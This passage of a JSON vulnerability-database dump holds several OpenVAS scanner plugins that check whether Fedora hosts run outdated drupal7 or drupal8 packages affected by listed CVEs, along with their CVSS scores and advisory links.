value:\"VendorFix\");\n script_tag(name:\"qod_type\", 
value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.10~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-16T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-8fd924a53d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_8fd924a53d_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-8fd924a53d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874456\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-16 05:53:29 +0200 (Wed, 16 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-8fd924a53d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-8fd924a53d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OKWJWSEKSJJSQ7G5K3DVNXGLB44LQX64\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-2359c2ae0e", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874428", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874428", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_2359c2ae0e_drupal7_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874428\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 06:06:46 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\", \"CVE-2017-6922\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-2359c2ae0e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MFVJWW3I4N6VEV7R3N23SPQMTUAXVS5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-1ba93b3144", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874422", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874422", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_1ba93b3144_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-1ba93b3144\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874422\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:57 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-1ba93b3144\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-1ba93b3144\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L2NHXS355OJ7C7ZEAGKMOPFWU6SUYYUV\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-7d748596e9", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310814523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7d748596e9_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-7d748596e9\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814523\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 08:19:36 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-7d748596e9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7d748596e9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZGZBSHQC6C3WLIATUZXNKC3DB73ADIXZ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2018-7d748596e9 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated 
package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.2~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-04-03T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-79bd99f9a8", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-6341", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310875534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875534", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875534\");\n script_version(\"2019-04-03T06:51:54+0000\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2019-6341\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-79bd99f9a8\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-79bd99f9a8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QNTLCBAN6T7WYR5C4TNEYQD65IIR3V4P\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-79bd99f9a8 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source content management platform powering millions of\nwebsites and applications. 
Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.13~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-6e6d8c314b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6929", "CVE-2017-6930", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874382", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874382", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_6e6d8c314b_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-6e6d8c314b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 
2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874382\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 08:51:05 +0200 (Wed, 25 Apr 2018)\");\n script_cve_id(\"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\",\n \"CVE-2017-6931\", \"CVE-2017-6928\", \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-6e6d8c314b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-6e6d8c314b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWSND764JDPO7QHXKOFVZCECOMLR3N6L\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.6~3.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2018-7600", "CVE-2019-10911", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-10910", "CVE-2019-10909", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310876320", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876320", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT 
ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876320\");\n script_version(\"2019-05-17T10:04:07+0000\");\n script_cve_id(\"CVE-2019-10909\", \"CVE-2019-10910\", \"CVE-2019-10911\", \"CVE-2019-11358\", \"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:04:07 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-08 02:09:58 +0000 (Wed, 08 May 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-1a3edd7e8a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-1a3edd7e8a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source 
content management platform powering millions of\nwebsites and applications. Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.15~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-922cc2fbaa", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6924", "CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6923", "CVE-2017-6920", "CVE-2017-6929", "CVE-2017-6921", "CVE-2017-6930", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6925"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874383", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874383", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_922cc2fbaa_drupal8_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-922cc2fbaa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone 
